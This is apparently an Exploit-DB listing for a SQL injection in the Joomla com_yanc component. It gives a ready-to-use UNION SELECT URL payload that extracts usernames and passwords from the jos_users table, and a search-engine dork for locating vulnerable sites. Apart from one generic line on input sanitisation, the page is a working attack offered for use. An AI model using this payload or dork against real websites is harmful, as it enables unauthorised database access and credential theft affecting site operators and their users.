Joomla com_yanc Remote Sql Injection Vulnerability

vendor:

com_yanc

by:

Snakespc

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: com_yanc

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla com_yanc Remote Sql Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable Joomla application. This request contains malicious SQL statements that can be used to extract sensitive information from the database, such as usernames and passwords. The exploit code for this vulnerability is available at http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.

Source

Exploit-DB raw data:

==============================================================================
[»] Joomla com_yanc Remote Sql Injection Vulnerability
==============================================================================
   
[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ His0k4, PrEdAtOr >>> All My Mamber >> sec-war.com/cc ]
[»] Dork:     [inurl:index.php?option=com_yanc "listid" ]   
###########################################################################
 ===[ Exploit ]===
   
[»] http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--
[»]Author: Snakespc <-
###########################################################################